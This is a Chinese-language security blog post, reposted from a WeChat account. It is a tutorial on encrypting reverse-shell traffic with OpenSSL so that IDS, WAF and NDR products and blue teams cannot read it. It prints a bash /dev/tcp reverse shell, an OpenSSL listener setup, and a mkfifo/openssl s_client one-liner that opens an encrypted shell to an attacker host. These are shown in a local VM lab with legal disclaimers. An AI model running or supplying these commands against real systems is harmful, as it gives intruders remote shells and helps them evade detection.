利用OpenSSL对反弹shell进行流量加密

admin 2025年2月15日22:17:39评论12 views字数 1567阅读5分13秒阅读模式

在渗透测试的后渗透阶段为了更进一步横向扩大战果,往往需要反弹shell,而实际渗透的内网环境中大部分都会有一些安全产品(WAF/IPS/IDS/NDR/HIDS)等防护软件会进行流量检测,我们常规的反弹shell有一个个致命的弱点就是所有流量都是明文传输的,这样很容易被拦截和被蓝队发现进而流量回溯分析,那攻击就会被阻断,所以流量加密是一个攻击者必备的技能,我们可以看看一些apt相关的报告,很多apt组织都会去做一个流量加密。(未知攻焉知防)

测试环境

攻击机kali:192.168.0.110

目标机centos7:192.168.0.111

先走一遍常规的反弹shell

Kali上监听6666端口

利用OpenSSL对反弹shell进行流量加密

受害机上先抓个包,然后执行命令反弹shell

tcpdump -i 网卡名称 -w 保存地址

利用OpenSSL对反弹shell进行流量加密

bash -i>& /dev/tcp/192.168.0.110/6666 0>&1

然后去攻击机看看

利用OpenSSL对反弹shell进行流量加密

成功弹过来了,我们断开tcpdump然后用wireshark看看。

利用OpenSSL对反弹shell进行流量加密

追踪数据流发现,我们攻击的流量都是明文显示,如同裸奔。

下面我们使用openssl进行流量加密

在攻击机上使用OpenSSL生成自签名证书

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

利用OpenSSL对反弹shell进行流量加密

在攻击机上监听端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 10086

利用OpenSSL对反弹shell进行流量加密

在目标机执行命令(记得提前tcpdump抓包)

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.110:10086 > /tmp/s; rm /tmp/s

利用OpenSSL对反弹shell进行流量加密

然后我们看到弹过来了

利用OpenSSL对反弹shell进行流量加密

执行几个命令,然后去目标机器关闭抓包,拿去wireshark看看。

利用OpenSSL对反弹shell进行流量加密

利用OpenSSL对反弹shell进行流量加密可以看到,已经加密了。

MSF流量加密也可以使用openssl这个方法,各位可以参考其他大佬的文章,还有cs修改profile进行流量加密,原本想一并写在这篇文章里的,奈何你们过520给我整emo了没动力了,摆烂摆烂,下面放一下其他大佬的文章,你们可以看他们的参考再拓展。

https://mp.weixin.qq.com/s/jVjRKtR4KHHse3WbAQsKvQ

https://mp.weixin.qq.com/s/J5a3klXbAQpaiAYoxpQ19w

https://mp.weixin.qq.com/s/E0_7PXxH7GB7CIp4STEUTQ

https://mp.weixin.qq.com/s/Jw6nmpyWXZnAws2IIOgXdg

https://mp.weixin.qq.com/s/2ja07gCboEVU0D18BQIa0g

https://mp.weixin.qq.com/s/SvM2SyWowh3sHEhxXN5PWA

https://mp.weixin.qq.com/s/JRnJkqXktje49mO3LYaQKA

https://mp.weixin.qq.com/s/lKAHrkNCvZtVdCfRKbYB4g

https://mp.weixin.qq.com/s/ZD1XFINzo-JbrkbJCyHNXA

https://mp.weixin.qq.com/s/uQL_JhTvQUa4k7R9ZFVfww

(上面的链接都是一些大佬的公众号文章,我文章没排版看不习惯或者看我文章做出现bug了就去看他们的)

文章仅供学习参考,过程也是利用本地虚拟机演示,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者和本公众号无关。

原文始发于微信公众号(韭要学安全):利用OpenSSL对反弹shell进行流量加密

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月15日22:17:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用OpenSSL对反弹shell进行流量加密https://cn-sec.com/archives/1902897.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息